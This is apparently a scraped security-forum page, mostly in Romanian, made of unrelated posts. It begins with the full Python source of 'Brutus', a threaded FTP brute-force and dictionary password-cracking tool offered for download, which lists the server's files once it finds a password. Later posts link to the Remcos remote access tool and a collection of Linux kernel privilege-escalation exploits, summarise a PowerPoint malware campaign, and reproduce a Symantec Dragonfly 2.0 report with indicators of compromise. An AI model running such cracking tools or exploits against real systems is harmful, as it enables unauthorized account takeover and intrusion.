Leaderboard

Brutus is a small threaded python FTP brute-force and dictionary attack tool. It supports several brute-force parameters such as a custom character sets, password length, minimum password length, prefix, and postfix strings to passwords generated. Download brutus-0.3.py Usage: usage: brutus.py [-h] [-w WORDLIST] [-c CHARSET] [-l [LENGTH]] [-m [MINLENGTH]] [-r PREFIX] [-o POSTFIX] [-p [PAUSE]] [-t [THREADS]] [-v [VERBOSE]] host username positional arguments: host FTP host username username to crack optional arguments: -h, --help show this help message and exit -w WORDLIST, --wordlist WORDLIST wordlist of passwords -c CHARSET, --charset CHARSET character set for brute-force -l [LENGTH], --length [LENGTH] password length for brute-force -m [MINLENGTH], --minlength [MINLENGTH] Minimum password length -r PREFIX, --prefix PREFIX prefix each password for brute-force -o POSTFIX, --postfix POSTFIX postfix each password for brute-force -p [PAUSE], --pause [PAUSE] pause time between launching threads -t [THREADS], --threads [THREADS] num of threads -v [VERBOSE], --verbose [VERBOSE] verbose output Mirror: ################################################################################ # tool: Brutus - FTP Brute-Force/Dictionary Attack Tool # version: 0.3 # email: mrh@bushisecurity.com # www: bushisecurity.com/brutus/ ################################################################################ # MIT License # Copyright (c) 2017 Phillip Aaron # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal# # in the Software without restriction, including without limitation the rights# # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell# # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import argparse, sys, threading, time from datetime import datetime from itertools import chain, product from ftplib import FTP # Create some global variables class glob: pwd = False # Used for stopping attack when password found chrset = "" # Character set for brute-force prefix = "" # Prefix string postfix = "" # Postfix string length = 8 # Default lenth of password minlength = 5 # Default min length of password thrds = 10 # Defualt num of threads verb = False # Default value for verbose output pause = 0.01 # Default throttle time, 1 = one second cnt = 0 # Counting number of attempts # Iterable Method for brute-forcing a character set and length def bruteforce(charset, maxlength, minlength): return (''.join(candidate) for candidate in chain.from_iterable(product(charset, repeat=i) for i in range(minlength, maxlength + 1))) # Method for making ftp connections def crack(host, user, pwd): try: if glob.verb: # Check for verbose output print "[" + str(glob.cnt) + "] Trying: " + pwd.strip() ftp = FTP(host) # Create FTP object if ftp.login (user, pwd): # Check if true print "\nPassword for " + user + ": " + pwd.strip() print "==================================================" glob.pwd = True # Set global value print ftp.dir() # Display contents of root FTP ftp.quit() # Disconnect from FTP except Exception as err: pass # Ignore errors # Method wait for threads to complete def wait(threads): for thread in threads: thread.join() # Method for staging attack def main(args): try: start = datetime.now() # Time attack started print "\nAttacking FTP user [" + args.username + "] at [" + args.host + "]" print "==================================================" thrdCnt = 0;threads = [] # Local variables # Set global variables if args.pause:glob.pause = float(args.pause) if args.verbose:glob.verb = True if args.threads:glob.thrds = int(args.threads) if args.length:glob.length = int(args.length) if args.minlength:glob.minlength = int(args.minlength) if args.charset:glob.chrset = args.charset if args.prefix:glob.prefix = args.prefix if args.postfix:glob.postfix = args.postfix if args.charset == None: # Create charset from printable ascii range for char in range(37,127):glob.chrset += chr(char) # Brute force attack if args.wordlist == None: for pwd in bruteforce(glob.chrset, int(glob.length),int(glob.minlength)): # Launch brute-force if glob.pwd: break # Stop if password found if thrdCnt != args.threads: # Create threads until args.threads if args.prefix: pwd = str(args.prefix) + pwd if args.postfix: pwd += str(args.postfix) thread = threading.Thread(target=crack, args=(args.host,args.username,pwd,)) thread.start() threads.append(thread) thrdCnt += 1;glob.cnt+=1 time.sleep(glob.pause) # Set pause time else: # Wait for threads to complete wait(threads) thrdCnt = 0 threads = [] # Dictionary attack else: with open(args.wordlist) as fle: # Open wordlist for pwd in fle: # Loop through passwords if glob.pwd: break # Stop if password found if thrdCnt != args.threads: # Create threads until args.threads thread = threading.Thread(target=crack, args=(args.host,args.username,pwd,)) thread.start() threads.append(thread) thrdCnt +=1;glob.cnt+=1 time.sleep(glob.pause) # Set pause time else: wait(threads) # Wait for threads to complete thrdCnt = 0 threads = [] except KeyboardInterrupt: print "\nUser Cancelled Attack, stopping remaining threads....." wait(threads) # Wait for threads to complete sys.exit(0) # Kill app wait(threads) # Wait for threads to complete stop = datetime.now() print "==================================================" print "Attack Duration: " + str(stop - start) print "Attempts: " + str(glob.cnt) + "\n" if __name__ == "__main__": # Declare an argparse variable to handle application command line arguments parser = argparse.ArgumentParser() parser.add_argument("host", action="store", help="FTP host") parser.add_argument("username", action="store", help="username to crack") parser.add_argument("-w", "--wordlist", action="store", help="wordlist of passwords") parser.add_argument("-c", "--charset", action="store", help="character set for brute-force") parser.add_argument("-l", "--length", action="store", help="password length for brute-force", nargs='?', default=8, const=8, type=int) parser.add_argument("-m","--minlength", action="store", nargs='?', default=1, const=1, help="Minimum password length", type=int) parser.add_argument("-r","--prefix", action="store", help="prefix each password for brute-force") parser.add_argument("-o","--postfix", action="store", help="postfix each password for brute-force") parser.add_argument("-p", "--pause", action="store", help="pause time between launching threads", nargs='?', default=0.01, const=0.01) parser.add_argument("-t", "--threads", action="store", help="num of threads", nargs='?', default=10, const=10, type=int) parser.add_argument("-v", "--verbose", action="store", help="verbose output", nargs='?', default=False, const=True) # Show help if required arg not included if len(sys.argv[1:])==0: parser.print_help() parser.exit() args = parser.parse_args() if args.minlength != None or args.length != None: if args.minlength > args.length: print "\n** Argument Logic Error **" print "Minimum password length [-m "+str(args.minlength)+"] is greater than Password length [-l "+str(args.length)+"]\n" parser.print_help() parser.exit() main(args) Source

Site oficial: http://www.grab-m.com Download Free Version: http://grab-m.com/download/setup.exe M-am chinuit o luna la programelul asta eu si inca un coleg. Sper sa va placa. Daca nu returneaza prea multe in simple search incercati un query gen: yahoo.com

https://breaking-security.net/remcos/remcos-free/

Cu ocazia aniversarii a zece ani de FileList, au decis sa lanseze mai multe surprize, unda dintre acestea fiind: Toate bune si frumoase, doar ca, daca esti tampit ca mine si ai gasit prima data giftbox-ul la ora 5 dimineata (sau pentru oamenii normali, esti ocupat) si nu ai cum sa verifici la 24 de ore, vei pierde din premii*. Si cum suntem cu totii 0xH4X0R1 pe aici am decis sa fac un mic script in PowerShell (daca am chef/rabdare il voi face si in Python) care sa se ocupe de problema: Mod de utilizare: Copy - Paste la cod intr-o fereastra de PowerShell apoi rulati Invoke-FileListGetGift. Salvati codul intr-un fisier *.ps1 apoi din PowerShell ii faceti source: adica scrieti in consola ". .\NumeFisier.ps1" (atentie la punctul din fata - e ca la bash) apoi rulati Invoke-FileListGetGift. Daca doriti sa vedeti mesajele de debug setati $DebugPreference = "Continue" in consola din care rulati apoi apelati Invoke-FileListGetGift.

Versiunea Python2 dupa cum am promis. Imi cer scuze legat de calitatea codului.

Cand am citit titlul credeam ca vii sa ceri sfaturi de gonoree, sifilis, chlamydia, etc.

https://www.steganos.com/specials/cobi1617/sos

done.

Asa fac astia de la packetstormsecurity, mai fac "teste" pentru tools. Sau unele fake.

Python, indentare. Posibil sa se piarda spatiile/tab-urile pe la copy/paste.

Chiar asa, care e faza cu A-urile? Nu inteleg.

'sup with the As? Skiddie protection?

A few months back we reported how opening a simple MS Word file could compromise your computer using a critical vulnerability in Microsoft Office. The Microsoft Office remote code execution vulnerability (CVE-2017-0199) resided in the Windows Object Linking and Embedding (OLE) interface for which a patch was issued in April this year, but threat actors are still abusing the flaw through the different mediums. Security researchers have spotted a new malware campaign that is leveraging the same exploit, but for the first time, hidden behind a specially crafted PowerPoint (PPSX) Presentation file. According to the researchers at Trend Micro, who spotted the malware campaign, the targeted attack starts with a convincing spear-phishing email attachment, purportedly from a cable manufacturing provider and mainly targets companies involved in the electronics manufacturing industry. Researchers believe this attack involves the use of a sender address disguised as a legitimate email sent by a sales and billing department. Here's How the Attack Works: The complete attack scenario is listed below: Step 1: The attack begins with an email that contains a malicious PowerPoint (PPSX) file in the attachment, pretending to be shipping information about an order request. Step 2: Once executed, the PPSX file calls an XML file programmed in it to download "logo.doc" file from a remote location and runs it via the PowerPoint Show animations feature. Step 3: The malformed Logo.doc file then triggers the CVE-2017-0199 vulnerability, which downloads and executes RATMAN.exe on the targeted system. Step 4: RATMAN.exe is a Trojanized version of the Remcos Remote Control tool, which when installed, allows attackers to control infected computers from its command-and-control server remotely. Remcos is a legitimate and customizable remote access tool that allows users to control their system from anywhere in the world with some capabilities, like a download and execute the command, a keylogger, a screen logger, and recorders for both webcam and microphone. Since the exploit is used to deliver infected Rich Text File (.RTF) documents, most detection methods for CVE-2017-0199 focuses on the RTF. So, the use of a new PPSX files allows attackers to evade antivirus detection as well. The easiest way to prevent yourself completely from this attack is to download and apply patches released by Microsoft in April that will address the CVE-2017-0199 vulnerability. Source

Salut! Cum ai facut, pana la urma? Ai deschis? A mers? Pe partea legala cum ai facut? De unde ai luat produse? Mersi frumos!

Pe aceeasi tema, lista exploituri de Linux Kernel (privilege escalation): https://github.com/lucyoa/kernel-exploits Aveti versiunile de Kernel vulnerabile pentru fiecare exploit in parte. In plus aveti si varianta deja compilata pentru o parte din ele (daca aveti incredere si nu mai vreti sa pierdeti timpul cu compilation flags si instalari de biblioteci).

Resurgence in energy sector attacks, with the potential for sabotage, linked to re-emergence of Dragonfly cyber espionage group The energy sector in Europe and North America is being targeted by a new wave of cyber attacks that could provide attackers with the means to severely disrupt affected operations. The group behind these attacks is known as Dragonfly. The group has been in operation since at least 2011 but has re-emerged over the past two years from a quiet period following exposure by Symantec and a number of other researchers in 2014. This “Dragonfly 2.0” campaign, which appears to have begun in late 2015, shares tactics and tools used in earlier campaigns by the group. The energy sector has become an area of increased interest to cyber attackers over the past two years. Most notably, disruptions to Ukraine’s power system in 2015 and 2016 were attributed to a cyber attack and led to power outages affecting hundreds of thousands of people. In recent months, there have also been media reports of attempted attacks on the electricity grids in some European countries, as well as reports of companies that manage nuclear facilities in the U.S. being compromised by hackers. The Dragonfly group appears to be interested in both learning how energy facilities operate and also gaining access to operational systems themselves, to the extent that the group now potentially has the ability to sabotage or gain control of these systems should it decide to do so. Symantec customers are protected against the activities of the Dragonfly group. Figure 1. An outline of the Dragonfly group's activities in its most recent campaign Dragonfly 2.0 Symantec has evidence indicating that the Dragonfly 2.0 campaign has been underway since at least December 2015 and has identified a distinct increase in activity in 2017. Symantec has strong indications of attacker activity in organizations in the U.S., Turkey, and Switzerland, with traces of activity in organizations outside of these countries. The U.S. and Turkey were also among the countries targeted by Dragonfly in its earlier campaign, though the focus on organizations in Turkey does appear to have increased dramatically in this more recent campaign. As it did in its prior campaign between 2011 and 2014, Dragonfly 2.0 uses a variety of infection vectors in an effort to gain access to a victim’s network, including malicious emails, watering hole attacks, and Trojanized software. The earliest activity identified by Symantec in this renewed campaign was a malicious email campaign that sent emails disguised as an invitation to a New Year’s Eve party to targets in the energy sector in December 2015. The group conducted further targeted malicious email campaigns during 2016 and into 2017. The emails contained very specific content related to the energy sector, as well as some related to general business concerns. Once opened, the attached malicious document would attempt to leak victims’ network credentials to a server outside of the targeted organization. In July, Cisco blogged about email-based attacks targeting the energy sector using a toolkit called Phishery. Some of the emails sent in 2017 that were observed by Symantec were also using the Phishery toolkit (Trojan.Phisherly), to steal victims’ credentials via a template injection attack. This toolkit became generally available on GitHub in late 2016, As well as sending malicious emails, the attackers also used watering hole attacks to harvest network credentials, by compromising websites that were likely to be visited by those involved in the energy sector. The stolen credentials were then used in follow-up attacks against the target organizations. In one instance, after a victim visited one of the compromised servers, Backdoor.Goodor was installed on their machine via PowerShell 11 days later. Backdoor.Goodor provides the attackers with remote access to the victim’s machine. In 2014, Symantec observed the Dragonfly group compromise legitimate software in order to deliver malware to victims, a practice also employed in the earlier 2011 campaigns. In the 2016 and 2017 campaigns the group is using the evasion framework Shellter in order to develop Trojanized applications. In particular, Backdoor.Dorshel was delivered as a trojanized version of standard Windows applications. Symantec also has evidence to suggest that files masquerading as Flash updates may be used to install malicious backdoors onto target networks—perhaps by using social engineering to convince a victim they needed to download an update for their Flash player. Shortly after visiting specific URLs, a file named “install_flash_player.exe” was seen on victim computers, followed shortly by the Trojan.Karagany.B backdoor. Typically, the attackers will install one or two backdoors onto victim computers to give them remote access and allow them to install additional tools if necessary. Goodor, Karagany.B, and Dorshel are examples of backdoors used, along with Trojan.Heriplor. Strong links with earlier campaigns There are a number of indicators linking recent activity with earlier Dragonfly campaigns. In particular, the Heriplor and Karagany Trojans used in Dragonfly 2.0 were both also used in the earlier Dragonfly campaigns between 2011 and 2014. Trojan.Heriplor is a backdoor that appears to be exclusively used by Dragonfly, and is one of the strongest indications that the group that targeted the western energy sector between 2011 and 2014 is the same group that is behind the more recent attacks. This custom malware is not available on the black market, and has not been observed being used by any other known attack groups. It has only ever been seen being used in attacks against targets in the energy sector. Trojan.Karagany.B is an evolution of Trojan.Karagany, which was previously used by Dragonfly, and there are similarities in the commands, encryption, and code routines used by the two Trojans. Trojan.Karagny.B doesn’t appear to be widely available, and has been consistently observed being used in attacks against the energy sector. However, the earlier Trojan.Karagany was leaked on underground markets, so its use by Dragonfly is not necessarily exclusive. Feature Dragonfly (2013-2014) Dragonfly 2.0 (2015-2017) Link strength Backdoor.Oldrea Yes No None Trojan.Heriplor (Oldrea stage II) Yes Yes Strong Trojan.Karagany Yes Yes (Trojan.Karagany.B) Medium-Strong Trojan.Listrix (Karagany stage II) Yes Yes Medium-Strong “Western” energy sector targeted Yes Yes Medium Strategic website compromises Yes Yes Weak Phishing emails Yes Yes Weak Trojanized applications Yes Yes Weak Figure 2. Links between current and earlier Dragonfly cyber attack campaigns Potential for sabotage Sabotage attacks are typically preceded by an intelligence-gathering phase where attackers collect information about target networks and systems and acquire credentials that will be used in later campaigns. The most notable examples of this are Stuxnet and Shamoon, where previously stolen credentials were subsequently used to administer their destructive payloads. The original Dragonfly campaigns now appear to have been a more exploratory phase where the attackers were simply trying to gain access to the networks of targeted organizations. The Dragonfly 2.0 campaigns show how the attackers may be entering into a new phase, with recent campaigns potentially providing them with access to operational systems, access that could be used for more disruptive purposes in future. The most concerning evidence of this is in their use of screen captures. In one particular instance the attackers used a clear format for naming the screen capture files, [machine description and location].[organization name]. The string “cntrl” (control) is used in many of the machine descriptions, possibly indicating that these machines have access to operational systems. Clues or false flags? While Symantec cannot definitively determine Dragonfly’s origins, this is clearly an accomplished attack group. It is capable of compromising targeted organizations through a variety of methods; can steal credentials to traverse targeted networks; and has a range of malware tools available to it, some of which appear to have been custom developed. Dragonfly is a highly focused group, carrying out targeted attacks on energy sector targets since at least 2011, with a renewed ramping up of activity observed in the last year. Some of the group’s activity appears to be aimed at making it more difficult to determine who precisely is behind it: The attackers used more generally available malware and “living off the land” tools, such as administration tools like PowerShell, PsExec, and Bitsadmin, which may be part of a strategy to make attribution more difficult. The Phishery toolkit became available on Github in 2016, and a tool used by the group—Screenutil—also appears to use some code from CodeProject. The attackers also did not use any zero days. As with the group’s use of publicly available tools, this could be an attempt to deliberately thwart attribution, or it could indicate a lack of resources. Some code strings in the malware were in Russian. However, some were also in French, which indicates that one of these languages may be a false flag. Conflicting evidence and what appear to be attempts at misattribution make it difficult to definitively state where this attack group is based or who is behind it. What is clear is that Dragonfly is a highly experienced threat actor, capable of compromising numerous organizations, stealing information, and gaining access to key systems. What it plans to do with all this intelligence has yet to become clear, but its capabilities do extend to materially disrupting targeted organizations should it choose to do so. Protection Symantec customers are protected against Dragonfly activity, Symantec has also made efforts to notify identified targets of recent Dragonfly activity. Symantec has the following specific detections in place for the threats called out in this blog: Trojan.Phisherly Backdoor.Goodor Trojan.Karagany.B Backdoor.Dorshel Trojan.Heriplor Trojan.Listrix Trojan.Karagany Symantec has also developed a list of Indicators of Compromise to assist in identifying Dragonfly activity: Family MD5 Command & Control Backdoor.Dorshel b3b5d67f5bbf5a043f5bf5d079dbcb56 hxxp://103.41.177.69/A56WY Trojan.Karagany.B 1560f68403c5a41e96b28d3f882de7f1 hxxp://37.1.202.26/getimage/622622.jpg Trojan.Heriplor e02603178c8c47d198f7d34bcf2d68b8 Trojan.Listrix da9d8c78efe0c6c8be70e6b857400fb1 Hacktool.Credrix a4cf567f27f3b2f8b73ae15e2e487f00 Backdoor.Goodor 765fcd7588b1d94008975c4627c8feb6 Trojan.Phisherly 141e78d16456a072c9697454fc6d5f58 184.154.150.66 Screenutil db07e1740152e09610ea826655d27e8d Customers of the DeepSight Intelligence Managed Adversary and Threat Intelligence (MATI) service have previously received reporting on the Dragonfly 2.0 group, which included methods of detecting and thwarting the activities of this adversary. Best Practices Dragonfly relies heavily on stolen credentials to compromise a network. Important passwords, such as those with high privileges, should be at least 8-10 characters long (and preferably longer) and include a mixture of letters and numbers. Encourage users to avoid reusing the same passwords on multiple websites and sharing passwords with others should be forbidden. Delete unused credentials and profiles and limit the number of administrative-level profiles created. Employ two-factor authentication (such as Symantec VIP) to provide an additional layer of security, preventing any stolen credentials from being used by attackers. Emphasize multiple, overlapping, and mutually supportive defensive systems to guard against single point failures in any specific technology or protection method. This should include the deployment of regularly updated firewalls as well as gateway antivirus, intrusion detection or protection systems (IPS), website vulnerability with malware protection, and web security gateway solutions throughout the network. Implement and enforce a security policy whereby any sensitive data is encrypted at rest and in transit. Ensure that customer data is encrypted as well. This can help mitigate the damage of potential data leaks from within an organization. Implement SMB egress traffic filtering on perimeter devices to prevent SMB traffic leaving your network onto the internet. Educate employees on the dangers posed by spear-phishing emails, including exercising caution around emails from unfamiliar sources and opening attachments that haven’t been solicited. A full protection stack helps to defend against emailed threats, including Symantec Email Security.cloud, which can block email-borne threats, and Symantec Endpoint Protection, which can block malware on the endpoint. Symantec Messaging Gateway’s Disarm technology can also protect computers from threats by removing malicious content from attached documents before they even reach the user. Understanding the tools, techniques, and procedures (TTP) of adversaries through services like DeepSight Adversary Intelligence fuels effective defense from advanced adversaries like Dragonfly 2.0. Beyond technical understanding of the group, strategic intelligence that informs the motivation, capability, and likely next moves of the adversaries ensures more timely and effective decisions in proactively safeguarding your environment from these threats. Source

Pentru 2 milioane diferenta romanul prefera sa il ia din magazin. Mai scade pretul daca vrei sa faci afaceri.

HUNT Burp Suite Extension HUNT is a Burp Suite extension to: Identify common parameters vulnerable to certain vulnerability classes. Organize testing methodologies inside of Burp Suite. HUNT Scanner (hunt_scanner.py) This extension does not test these parameters but rather alerts on them so that a bug hunter can test them manually (thoroughly). For each class of vulnerability, Bugcrowd has identified common parameters or functions associated with that vulnerability class. We also provide curated resources in the issue description to do thorough manual testing of these vulnerability classes. HUNT Methodology (hunt_methodology.py) This extension allows testers to send requests and responses to a Burp tab called "HUNT Methodology". This tab contains a tree on the left side that is a visual representation of your testing methodology. By sending request/responses here testers can organize or attest to having done manual testing in that section of the application or having completed a certain methodology step. Getting Started with HUNT First ensure you have the latest standalone Jython JAR set up under "Extender" -> "Options". Add HUNT via "Extender" -> "Extensions". HUNT Scanner will begin to run across traffic that flows through the proxy. Important to note, HUNT Scanner leverages the passive scanning API. Here are the conditions under which passive scan checks are run: First request of an active scan Proxy requests Any time "Do a passive scan" is selected from the context menu Passive scans are not run on the following: On every active scan response On Repeater responses On Intruder responses On Sequencer responses On Spider responses Instead, the standard workflow would be to set your scope, run Burp Spider from Target tab, then right-click "Passively scan selected items". HUNT Scanner Vulnerability Classes SQL Injection Local/Remote File Inclusion & Path Traversal Server Side Request Forgery & Open Redirect OS Command Injection Insecure Direct Object Reference Server Side Template Injection Logic & Debug Parameters Cross Site Scripting External Entity Injection Malicious File Upload TODO Change regex for parameter names to include user_id instead of just id Search in scanner window Highlight param in scanner window Implement script name checking, REST URL support, JSON & XML post-body params. Support normal convention of Request tab: Raw, Params, Headers, Hex sub-tabs inside scanner Add more methodology JSON files: Web Application Hacker's Handbook PCI HIPAA CREST OWASP Top Ten OWASP Application Security Verification Standard Penetration Testing Execution Standard Burp Suite Methodology Add more text for advisory in scanner window Add more descriptions and resources in methodology window Add functionality to send request/response to other Burp tabs like Repeater Authors JP Villanueva Jason Haddix Ryan Black Fatih Egbatan Vishal Shah License Licensed with the Apache 2.0 License here Sursa: https://github.com/bugcrowd/HUNT

Salut, am facut un php project example pt un prieten, am facut un exemplu pt un inceput de proiect simplu, care sa aiba stric ce m-ar interesa pe mine la inceput, bine structurat si SEO am ales sa fac din fiecare pagina o clasa, si dupa in clasa pagini sa incarce ce mai vrea el, account, messages or whatever. nu m-am gandit mai departe de atat, pentru ca am vrut sa fie un simplu exemplu pt prietenul meu. https://github.com/Armyw0w/PHPExampleProject pareri/sugestii ?

E mai greu de folosit dar te descurci tu. download link direct.